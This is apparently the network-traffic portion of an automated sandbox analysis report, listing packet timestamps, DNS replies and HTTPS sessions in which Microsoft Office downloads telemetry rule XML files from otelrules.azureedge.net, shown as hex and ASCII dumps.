Oct 30, 2024 03:56:33.106827021 CET4435277513.107.246.45192.168.2.5
Oct 30, 2024 03:56:33.106889963 CET4435277513.107.246.45192.168.2.5
Oct 30, 2024 03:56:33.106957912 CET52775443192.168.2.513.107.246.45
Oct 30, 2024 03:56:33.107002020 CET4435277513.107.246.45192.168.2.5
Oct 30, 2024 03:56:33.107057095 CET4435277513.107.246.45192.168.2.5
Oct 30, 2024 03:56:33.107115030 CET52775443192.168.2.513.107.246.45
Oct 30, 2024 03:56:33.107249975 CET52775443192.168.2.513.107.246.45
Oct 30, 2024 03:56:33.107250929 CET52775443192.168.2.513.107.246.45
Oct 30, 2024 03:56:33.107287884 CET4435277513.107.246.45192.168.2.5
Oct 30, 2024 03:56:33.107310057 CET4435277513.107.246.45192.168.2.5
TimestampSource PortDest PortSource IPDest IP
Oct 30, 2024 03:55:37.367676020 CET53633931.1.1.1192.168.2.5
TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
Oct 30, 2024 03:55:23.583648920 CET1.1.1.1192.168.2.50x375bNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
Oct 30, 2024 03:55:23.583648920 CET1.1.1.1192.168.2.50x375bNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
Oct 30, 2024 03:55:37.030073881 CET1.1.1.1192.168.2.50x5f78No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
Oct 30, 2024 03:55:37.030073881 CET1.1.1.1192.168.2.50x5f78No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
Oct 30, 2024 03:56:26.593005896 CET1.1.1.1192.168.2.50xd84aNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
Oct 30, 2024 03:56:26.593005896 CET1.1.1.1192.168.2.50xd84aNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
  • otelrules.azureedge.net
Session IDSource IPSource PortDestination IPDestination Port
0192.168.2.54972213.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:37 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:37 UTC561INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:37 GMT
Content-Type: text/plain
Content-Length: 218853
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public
Last-Modified: Mon, 28 Oct 2024 13:23:36 GMT
ETag: "0x8DCF753BAA1B278"
x-ms-request-id: 174434da-801e-0015-686a-29f97f000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025537Z-16849878b78fkwcjkpn19c5dsn00000006ag00000000sveu
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:37 UTC15823INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
2024-10-30 02:55:38 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
Data Ascii: <S T="1" F="0" /> </L> <R> <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L>
2024-10-30 02:55:38 UTC16384INData Raw: 3c 53 20 54 3d 22 33 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 20 20 3c 53 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 53 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 38 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d
Data Ascii: <S T="3" /> </T> <ST> <S T="1" /> </ST></R><$!#>10820v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-
2024-10-30 02:55:38 UTC16384INData Raw: 6e 74 73 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 36 34 22 20 49 3d 22 38 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 45 76 65 6e 74 73 5f 41 76 67 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a
Data Ascii: nts" /> </C> <C T="U64" I="8" O="false" N="Events_Avg"> <S T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" />
2024-10-30 02:55:38 UTC16384INData Raw: 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20
Data Ascii: </S> <C T="U32" I="0" O="false" N="Count_CreateCard_ValidPersona_False"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32"
2024-10-30 02:55:38 UTC16384INData Raw: 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20
Data Ascii: _Count"> <C> <S T="31" /> </C> </C> <C T="U32" I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S
2024-10-30 02:55:38 UTC16384INData Raw: 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22
Data Ascii: <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3"
2024-10-30 02:55:38 UTC16384INData Raw: 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65
Data Ascii: </L> <R> <V V="0" T="I32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false
2024-10-30 02:55:38 UTC16384INData Raw: 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20
Data Ascii: T="B" /> </R> </O> </F> <F T="6"> <O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" />
2024-10-30 02:55:38 UTC16384INData Raw: 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54
Data Ascii: O> </F> <F T="6"> <O T="EQ"> <L> <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T


Session IDSource IPSource PortDestination IPDestination Port
1192.168.2.55250413.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:39 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:39 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:39 GMT
Content-Type: text/xml
Content-Length: 3788
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
ETag: "0x8DC582BAC2126A6"
x-ms-request-id: 85f3058c-201e-00aa-6c2c-283928000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025539Z-15b8d89586f4zwgbgswvrvz4vs00000008q000000000fqts
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:39 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


Session IDSource IPSource PortDestination IPDestination Port
2192.168.2.55250513.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:39 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:39 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:39 GMT
Content-Type: text/xml
Content-Length: 450
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
ETag: "0x8DC582BD4C869AE"
x-ms-request-id: 8f1f3dd8-601e-0097-4789-28f33a000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025539Z-15b8d89586flspj6y6m5fk442w0000000dbg000000005ect
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:39 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


Session IDSource IPSource PortDestination IPDestination Port
3192.168.2.55250613.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:39 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:39 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:39 GMT
Content-Type: text/xml
Content-Length: 2980
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
ETag: "0x8DC582BA80D96A1"
x-ms-request-id: 23ba7a24-801e-0015-5af3-24f97f000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025539Z-17c5cb586f67hfgj2durhqcxk8000000069g00000000bv3h
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:55:39 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


Session IDSource IPSource PortDestination IPDestination Port
4192.168.2.55250713.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:39 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:39 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:39 GMT
Content-Type: text/xml
Content-Length: 2160
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
ETag: "0x8DC582BA3B95D81"
x-ms-request-id: fc6998d3-101e-008d-52ad-2692e5000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025539Z-16849878b78p8hrf1se7fucxk8000000086g00000000sykv
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:55:39 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


Session IDSource IPSource PortDestination IPDestination Port
5192.168.2.55250813.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:55:39 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:55:39 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:55:39 GMT
Content-Type: text/xml
Content-Length: 408
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
ETag: "0x8DC582BB56D3AFB"
x-ms-request-id: c3a6d21e-601e-00ab-1dc6-2766f4000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T025539Z-17c5cb586f64v7xsc2ahm8gsgw000000029g00000000g4d9
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
